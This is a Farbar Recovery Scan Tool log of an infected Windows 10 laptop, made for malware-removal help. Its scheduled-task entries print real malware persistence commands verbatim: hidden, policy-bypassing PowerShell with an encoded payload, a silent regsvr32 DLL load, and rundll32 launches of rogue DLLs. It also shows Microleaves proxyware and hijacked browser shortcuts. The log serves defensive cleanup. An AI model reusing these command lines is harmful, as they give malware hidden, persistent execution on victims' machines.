Publicité
Publicité
Format du document : text/plain
Prévisualisation
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 08-10-2017
Ran by hp (10-10-2017 10:44:24)
Running from C:\Users\hp.LAPTOP-RUV870D4\Desktop
Windows 10 Home Version 1511 170904-1742 (X64) (2017-03-15 15:39:06)
Boot Mode: Normal
==========================================================
==================== Accounts: =============================
Administrator (S-1-5-21-2924308242-708578159-770495721-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-2924308242-708578159-770495721-503 - Limited - Disabled)
Guest (S-1-5-21-2924308242-708578159-770495721-501 - Limited - Disabled)
hp (S-1-5-21-2924308242-708578159-770495721-1002 - Administrator - Enabled) => C:\Users\hp.LAPTOP-RUV870D4
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
µTorrent (HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\uTorrent) (Version: 3.5.0.43916 - BitTorrent Inc.)
Adobe Acrobat DC (HKLM-x32\...\{AC76BA86-1033-FFFF-7760-0C0F074E4100}) (Version: 17.012.20098 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 26.0.0.127 - Adobe Systems Incorporated)
Adobe Flash Player 27 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 27.0.0.130 - Adobe Systems Incorporated)
Adobe Reader XI (11.0.03) - Français (HKLM-x32\...\{AC76BA86-7AD7-1036-7B44-AB0000000001}) (Version: 11.0.03 - Adobe Systems Incorporated)
Adobe Shockwave Player 12.2 (HKLM-x32\...\Adobe Shockwave Player) (Version: 12.2.9.199 - Adobe Systems, Inc.)
ArcGIS Desktop 10.5 (HKLM-x32\...\{76B58799-3448-4DE4-BA71-0FDFAA2A2E9A}) (Version: 10.5.6491 - Environmental Systems Research Institute, Inc.) Hidden
ArcGIS Desktop 10.5 (HKLM-x32\...\ArcGIS Desktop 10.5) (Version: 10.5.6491 - Environmental Systems Research Institute, Inc.)
ArcGIS License Manager 10.5 (HKLM-x32\...\{3A024FEA-3E14-4257-87D0-8FCA03257560}) (Version: 10.5.6491 - Environmental Systems Research Institute, Inc.) Hidden
ArcGIS License Manager 10.5 (HKLM-x32\...\ArcGIS License Manager 10.5) (Version: 10.5.6491 - Environmental Systems Research Institute, Inc.)
Assistant Mise à jour de Windows 10 (HKLM-x32\...\{D5C69738-B486-402E-85AC-2456D98A64E4}) (Version: 1.4.9200.22243 - Microsoft Corporation)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.)
Cisco LEAP Module (HKLM-x32\...\{AF312B06-5C5C-468E-89B3-BE6DE2645722}) (Version: 1.0.19 - Cisco Systems, Inc.)
Cisco PEAP Module (HKLM-x32\...\{0A4EF0E6-A912-4CDE-A7F3-6E56E7C13A2F}) (Version: 1.1.6 - Cisco Systems, Inc.)
CSPro 6.1 (HKLM-x32\...\{D833663E-6DEE-4F0E-8060-4B3B1F0CA55F}) (Version: 6.1.0 - U.S. Census Bureau)
CyberLink PhotoDirector (HKLM\...\{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.6.7006 - CyberLink Corp.) Hidden
CyberLink PhotoDirector (HKLM-x32\...\InstallShield_{5A454EC5-217A-42a5-8CE1-2DDEC4E70E01}) (Version: 5.0.6.7006 - CyberLink Corp.)
CyberLink Power Media Player 14 (HKLM-x32\...\{32C8E300-BDB4-4398-92C2-E9B7D8A233DB}) (Version: 14.0.2.5829 - CyberLink Corp.)
CyberLink PowerDirector 12 (HKLM\...\{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.5.4601 - CyberLink Corp.) Hidden
CyberLink PowerDirector 12 (HKLM-x32\...\InstallShield_{E1646825-D391-42A0-93AA-27FA810DA093}) (Version: 12.0.5.4601 - CyberLink Corp.)
CyberLink YouCam (HKLM-x32\...\{A9CEDD6E-4792-493e-BB35-D86D2E188A5A}) (Version: 6.0.2.4627 - CyberLink Corp.)
DisableMSDefender (HKLM\...\{74FE39A0-FB76-47CD-84BA-91E2BBB17EF2}) (Version: 1.0.0 - Hewlett-Packard Company) Hidden
Dropbox 25 GB (HKLM-x32\...\{0867A88D-764F-366E-9E21-130DA8B472C3}) (Version: 3.1.18.0 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.59.1 - Dropbox, Inc.) Hidden
Energy Star (HKLM\...\{465CA2B6-98AF-4E77-BE22-A908C34BB9EC}) (Version: 1.0.9 - Hewlett-Packard Company)
Ethnos 5.5 Web (HKLM-x32\...\{9ACF6CC6-571C-4E50-8E77-8DEFD567289F}) (Version: 5.5 - Soft Concept) Hidden
Ethnos 5.5 Web (HKLM-x32\...\InstallShield_{9ACF6CC6-571C-4E50-8E77-8DEFD567289F}) (Version: 5.5 - Soft Concept)
Evernote v. 5.8.13 (HKLM-x32\...\{A229420E-204B-11E5-B844-0050569584E9}) (Version: 5.8.13.8152 - Evernote Corp.)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 46.0.2490.80 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.28.15 - Google Inc.) Hidden
Herramientas de corrección de Microsoft Office 2016: español (HKLM-x32\...\{90160000-001F-0C0A-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
HP Documentation (HKLM\...\HP_Documentation) (Version: - HP)
HP ePrint SW (HKLM-x32\...\{88970959-baf7-4864-a39a-69a58e8ae5cf}) (Version: 5.0.18701 - HP)
HP Registration Service (HKLM\...\{D1E8F2D7-7794-4245-B286-87ED86C1893C}) (Version: 1.2.8305.5282 - Hewlett-Packard)
HP Support Assistant (HKLM-x32\...\{61EB474B-67A6-47F4-B1B7-386851BAB3D0}) (Version: 8.0.29.6 - Hewlett-Packard Company)
HP Support Solutions Framework (HKLM-x32\...\{D7D5F438-26EF-45AB-AB89-C476FBCF8584}) (Version: 12.0.26.62 - Hewlett-Packard Company)
HP System Event Utility (HKLM-x32\...\{D17A3B70-B75E-4C49-83D6-C17DDF65B35F}) (Version: 1.3.4 - Hewlett-Packard Company)
HP Welcome (HKLM\...\HPWelcome) (Version: 1.0 - HP Inc.)
HP Wireless Button Driver (HKLM-x32\...\{DD21DBC9-2A74-44DA-A543-B1F4AF3ABFCA}) (Version: 1.1.8.1 - HP)
IBM SPSS Statistics 21 (HKLM\...\{1E26B9C2-ED08-4EEA-83C8-A786502B41E5}) (Version: 21.0.0.0 - IBM Corp)
Intel(R) Chipset Device Software (HKLM-x32\...\{a47edec4-fa11-4d02-b329-4424d0197af8}) (Version: 10.1.1.7 - Intel(R) Corporation) Hidden
Intel(R) Dynamic Platform and Thermal Framework (HKLM-x32\...\{654EE65D-FAA4-4EA6-8C07-DC94E6A304D4}) (Version: 8.1.10603.192 - Intel Corporation)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.0.1156 - Intel Corporation)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4549 - Intel Corporation)
Intel(R) Rapid Storage Technology (HKLM\...\{409CB30E-E457-4008-9B1A-ED1B9EA21140}) (Version: 14.5.2.1088 - Intel Corporation)
KB4023057 (HKLM\...\{0C050BEE-16BE-4998-8959-2A421433DB6E}) (Version: 2.5.0.0 - Microsoft Corporation)
Micro Foundation 7 version 7.0 (HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\{D447DBF5-6383-4F6E-884E-411D1B3C321E}}_is1) (Version: 7.0 - Micro Foundation 7, Inc.)
Microsoft Office Professionnel Plus 2016 (HKLM-x32\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-2924308242-708578159-770495721-1002\...\OneDriveSetup.exe) (Version: 17.3.6998.0830 - Microsoft Corporation)
Microsoft Project Professionnel 2013 (HKLM\...\Office15.PRJPRO) (Version: 15.0.4420.1017 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2010 x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Mozilla Firefox 45.0 (x64 fr) (HKLM\...\Mozilla Firefox 45.0 (x64 fr)) (Version: 45.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 45.0 - Mozilla)
Online Application (HKLM-x32\...\{5266F634-7B7D-4537-BDDC-98DD6CFCBAA1}) (Version: 2.6.0 - Microleaves) <==== ATTENTION
Outils de vérification linguistique 2013 de Microsoft Office - Français (HKLM\...\{90150000-001F-040C-1000-0000000FF1CE}) (Version: 15.0.4420.1017 - Microsoft Corporation) Hidden
Outils de vérification linguistique 2016 de Microsoft Office - Français (HKLM-x32\...\{90160000-001F-040C-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
REALTEK Bluetooth Driver (HKLM-x32\...\{9D3D8C60-A5EF-4123-B2B9-172095903AB}) (Version: 1.0.0.48 - REALTEK Semiconductor Corp.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.3.9600.31213 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 10.1.505.2015 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7944 - Realtek Semiconductor Corp.)
REALTEK Wireless LAN Driver (HKLM-x32\...\{A5107464-AA9B-4177-8129-5FF2F42DD322}) (Version: 1.0.0.64 - REALTEK Semiconductor Corp.)
Skype Click to Call (HKLM-x32\...\{873F8E7C-10E6-449F-BD7E-5FBA7C8E1C9B}) (Version: 8.5.0.9167 - Microsoft Corporation)
Skype™ 7.1 (HKLM-x32\...\{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}) (Version: 7.1.105 - Skype Technologies S.A.)
swMSM (HKLM-x32\...\{612C34C7-5E90-47D8-9B5C-0F717DD82726}) (Version: 12.0.0.1 - Adobe Systems, Inc) Hidden
Synaptics Pointing Device Driver (HKLM\...\SynTPDeinstKey) (Version: 19.3.11.45 - Synaptics Incorporated)
Taalprogramma's voor Microsoft Office 2016 - Nederlands (HKLM-x32\...\{90160000-001F-0413-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
UpdateAssistant (HKLM-x32\...\{DE45508F-369E-4476-8F19-088F4933340E}) (Version: 1.8.0.0 - Microsoft Corporation) Hidden
VLC media player (HKLM\...\VLC media player) (Version: 2.2.4 - VideoLAN)
Windows 10 Update and Privacy Settings (HKLM\...\{4DFCD818-036A-4229-A67D-CF17DC461D92}) (Version: 1.0.14.0 - Microsoft Corporation)
WinRAR 5.50 (64-bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
==================== Custom CLSID (Whitelisted): ==========================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
ContextMenuHandlers1: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2015-03-17] (Adobe Systems Inc.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => -> No File
ContextMenuHandlers5: [igfxDTCM] -> {9B5F5829-A529-4B12-814A-E81BCB8D93FC} => C:\windows\system32\igfxDTCM.dll [2017-01-13] (Intel Corporation)
ContextMenuHandlers6: [Adobe.Acrobat.ContextMenu] -> {A6595CD1-BF77-430A-A452-18696685F7C7} => C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat Elements\ContextMenuShim64.dll [2015-03-17] (Adobe Systems Inc.)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)
==================== Scheduled Tasks (Whitelisted) =============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {1010958B-E5D8-4171-89C1-165C30A04D56} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis Install => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-07-11] (Hewlett-Packard Company)
Task: {139A1B1F-6D28-4481-A5D9-099AAAFB9519} - System32\Tasks\7fa873b86c1118b0b18259f1000e475e => sc start 7fa873b86c1118b0b18259f1000e475e <==== ATTENTION
Task: {13CF2881-C49E-4152-ADA7-93B139A8832E} - System32\Tasks\HPGenoobeReminder => C:\Program Files (x86)\Hewlett-Packard\HP Registration Service\HP GenOOBE\HPGenOOBE.exe [2015-07-21] ()
Task: {1E6D8B0C-60E3-467D-9FDE-56CCED13CF9E} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2016-09-21] ()
Task: {21650A89-7165-490E-977E-54015BA3148E} - System32\Tasks\DropboxUpdateTaskMachineUA => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2017-09-04] (Dropbox, Inc.)
Task: {2206D613-977D-4474-8462-BB9230C86123} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-07-11] (Hewlett-Packard Company)
Task: {2858581D-03A7-44A9-8DC2-FC25D50DF64E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\First Boot => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF_Utils.exe [2015-07-11] (Hewlett-Packard Company)
Task: {28960C04-679F-4C4B-8E95-8BEEE992E191} - System32\Tasks\Microsoft Office 15 Sync Maintenance for LAPTOP-RUV870D4-hp LAPTOP-RUV870D4 => C:\Program Files\Microsoft Office\Office15\MsoSync.exe [2012-10-01] (Microsoft Corporation)
Task: {355766DF-D606-4B38-AB12-6C432287F332} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {42CA5393-7368-465F-89B2-EA14BBDB7B06} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation)
Task: {4830AA1C-FE63-498A-B129-60CB93A5F4FE} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack => C:\Program Files\Microsoft Office\Office15\msoia.exe [2012-10-01] (Microsoft Corporation)
Task: {4BFDC474-42FA-4F48-87EE-2A0116EA9959} - System32\Tasks\DropboxUpdateTaskMachineCore => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [2017-09-04] (Dropbox, Inc.)
Task: {5DA1BAC6-AE17-4223-AD36-CE8E71265DBD} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe [2015-10-29] (CyberLink Corp.)
Task: {5ED0DC8D-47FA-48C1-8CE0-AE41715D3DB1} - System32\Tasks\Compare MP3 Two Jambers => C:\windows\system32\rundll32.exe "C:\Program Files\Compare MP3 Two Jambers\Compare MP3 Two Jambers.dll",mAtzsLM <==== ATTENTION
Task: {6D3D65C6-8508-42F3-B0CB-4C4D35C7B37B} - System32\Tasks\Online Application V2G3 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {6D918782-94FA-4DF8-B4DB-9A25F9E6DC10} - System32\Tasks\{D48E529E-DB33-75A3-0773-49F002B2650A} => C:\windows\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\f3810094\ce8fc3e9.dll" <==== ATTENTION
Task: {7B9D4088-5C2F-4CD6-AC43-FB6EA30B68C4} - System32\Tasks\RegistrationModuleReminder_Welcome-S-1-5-21-2924308242-708578159-770495721-1001 => C:\Program Files\HP\HP Welcome\Garage.Container.exe [2015-12-05] (HP Inc)
Task: {7D803203-4DFF-49FF-8F0B-F5EC65F2367E} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-05] (Google Inc.)
Task: {960DAD80-5E06-44B8-913D-A32DCAB0CF0D} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2017-07-19] (Adobe Systems Incorporated)
Task: {A62C39DB-1880-45DB-9E90-6C00E9E8F77D} - System32\Tasks\Online Application V2G1 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {A88C09C4-2CEA-4C9E-8C09-6098D9E4564A} - System32\Tasks\2ad9e22f09e61569c5eee072af04d2ab => powershell.exe -NoProfile -NoLogo -NonInteractive -ExecutionPolicy Bypass -File "C:\windows\2ad9e22f09e61569c5eee072af04d2ab.ps1" <==== ATTENTION
Task: {AE3DEA1A-7546-4121-8D51-0AE40D3A2EA9} - System32\Tasks\{04087847-0979-050E-7911-787E0F0F110B} => C:\windows\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand OwA7ACAAIAAgACAAOwAgACAAIAAgADsAOwAgACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAPQAiAHMAdABvAHAAIgA7ACQAcwBjAD0AIgBTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlACIAOwAkAFcAYQByAG4AaQBuAGcAUAByAGUAZgBlAHIA (the data entry has 9640 more characters). <==== ATTENTION
Task: {B58C15BF-2D73-4470-8FC3-9B8B6DD2B83E} - System32\Tasks\All RCover => C:\windows\system32\rundll32.exe "C:\Program Files\All RCover\All RCover.dll",hoRKzFFPwe <==== ATTENTION
Task: {C12D104A-32EC-4B82-B9B7-5A5734BAC991} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2015-06-19] (Hewlett-Packard)
Task: {C34904E2-0F29-4316-8B39-DC5C66E3A234} - System32\Tasks\{527C378A-E5D7-8021-846A-4F27D586AB30} => C:\ProgramData\{ECCDBBF9-5B66-0C52-A48B-6E9C049282A4}\1703B031-A0A8-079A-90C3-63DE1B44B925.exe [2017-10-09] () <==== ATTENTION
Task: {CF362911-599D-4AE2-A90C-A832263F93D2} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentFallBack2016 => C:\Program Files\Microsoft Office\Office16\msoia.exe [2015-07-31] (Microsoft Corporation)
Task: {D1287AAC-2CCD-4FF7-8BF2-8E928740BBC3} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-03-05] (Google Inc.)
Task: {D1B6948B-1724-4B70-93D8-8DB0BF4166C6} - System32\Tasks\Updater_Online_Application => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe [2017-06-18] (Microleaves) <==== ATTENTION
Task: {D6044C2D-9503-4D61-B4FA-44C5409EDDC2} - System32\Tasks\Online Application V2G2 => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe [2017-02-07] (Microleaves LTD) <==== ATTENTION
Task: {DFCB2C5E-1CA2-472E-A6D8-44596FE6E2DB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-07-11] (Hewlett-Packard Company)
Task: {E3C7774B-7972-435E-A14C-B942EC08FC35} - System32\Tasks\HP Metrics => C:\Program Files\HP\HP Welcome\Garage.Container.exe [2015-12-05] (HP Inc)
Task: {E8D11DFA-A6D0-4B9F-9709-111B7F11583E} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Solutions Framework Updater => C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\Modules\HPSSFUpdater.exe [2017-09-20] (HP Inc.)
Task: {EF112D44-9647-4011-BE82-021FA91D02EA} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\windows\SysWOW64\Macromed\Flash\FlashUtil32_27_0_0_130_pepper.exe [2017-09-14] (Adobe Systems Incorporated)
Task: {F73511E3-809A-4C49-B0A2-D8DB853F3B15} - System32\Tasks\Adobe Flash Player Updater => C:\windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2017-09-14] (Adobe Systems Incorporated)
Task: {FDF94A2E-6CA2-4475-8D6D-875E8CA58E0D} - System32\Tasks\Microsoft\Office\Office 15 Subscription Heartbeat => C:\Program Files\Common Files\Microsoft Shared\Office15\OLicenseHeartbeat.exe [2012-10-01] (Microsoft Corporation)
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\windows\Tasks\DropboxUpdateTaskMachineCore.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\windows\Tasks\DropboxUpdateTaskMachineUA.job => C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe
Task: C:\windows\Tasks\Online Application V2G1.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\windows\Tasks\Online Application V2G2.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\windows\Tasks\Online Application V2G3.job => C:\Program Files (x86)\Microleaves\Online Application\Version 2.6.0\Online-Guardian.exe <==== ATTENTION
Task: C:\windows\Tasks\Updater_Online_Application.job => C:\Program Files (x86)\Microleaves\Online Application\Online Application Updater.exe <==== ATTENTION
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\hp.LAPTOP-RUV870D4\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\AmazonShopping.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.amazon.com/gp/bit/amazonbookmark.html?tag=hp2-desktop-us-20&partner=HP
ShortcutWithArgument: C:\Users\hp.LAPTOP-RUV870D4\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\TripAdvisor.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://js.redirect.hp.com/jumpstation?bd=all&c=none&locale=all&pf=cnnb&s=TripAdvisor_W10_taskbar&tp=Taskbar
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --disable-quic
ShortcutWithArgument: C:\Users\Public\Desktop\Google Chrome.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> hxxp://www.yeadesktop.com/ --disable-quic
ShortcutWithArgument: C:\Users\Public\Desktop\Mozilla Firefox.lnk -> C:\Program Files\Mozilla Firefox\firefox.exe (Mozilla Corporation) -> hxxp://www.yeadesktop.com/
==================== Loaded Modules (Whitelisted) ==============
2017-09-04 11:06 - 2017-03-04 05:31 - 000185856 _____ () C:\windows\SYSTEM32\ism32k.dll
2017-09-02 23:01 - 2015-05-31 23:04 - 002448384 _____ () C:\Program Files\Compare MP3 Two Jambers\Compare MP3 Two Jambers.dll
2017-09-02 23:01 - 2017-08-25 22:33 - 001952256 ___SH () C:\Users\hp.LAPTOP-RUV870D4\AppData\Roaming\tmp546.dat
2017-09-25 15:18 - 2017-09-05 09:29 - 001360072 ____N () C:\Windows\system32\LanmaMasterHelp.dll
2016-12-15 03:15 - 2015-11-19 23:44 - 000127192 _____ () C:\Program Files (x86)\REALTEK\Realtek Bluetooth\BTDevMgr.exe
2016-12-15 03:36 - 2014-04-15 02:59 - 000389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
2017-09-08 10:18 - 2017-09-08 10:18 - 003430912 _____ () C:\windows\windefender.exe
2017-09-25 15:18 - 2017-09-05 09:31 - 002656960 _____ () C:\windows\system32\CoreUIComponents.dll
2016-12-15 02:55 - 2016-12-15 02:55 - 000093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2017-09-04 11:07 - 2016-07-01 03:48 - 000472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2017-09-04 11:05 - 2017-03-04 03:19 - 007992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2017-09-04 11:05 - 2017-03-04 03:14 - 000591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2017-09-25 15:18 - 2017-09-05 04:03 - 002483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2017-09-25 15:18 - 2017-09-05 04:06 - 004089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2017-09-08 10:14 - 2017-09-08 10:14 - 001247232 _____ () C:\Program Files\ZYSCVDO2L7\TDAJNHELG.exe
2017-09-08 10:15 - 2017-09-08 10:15 - 001247232 _____ () C:\Program Files\VLULHWYIV2\6989W5Y8C.exe
2017-09-08 10:15 - 2017-09-08 10:15 - 001247232 _____ () C:\Program Files\8ICSDJKCA8\8ICSDJKCA.exe
2017-09-08 10:46 - 2017-09-08 10:47 - 001247232 _____ () C:\Program Files\IEKQ8ZH03D\IEKQ8ZH03.exe
2017-09-08 10:47 - 2017-09-08 10:47 - 001247232 _____ () C:\Program Files\336K7Z08RL\336K7Z08R.exe
2017-10-09 12:11 - 2017-10-10 09:49 - 000567296 _____ () C:\windows\TEMP\g8532.tmp.exe
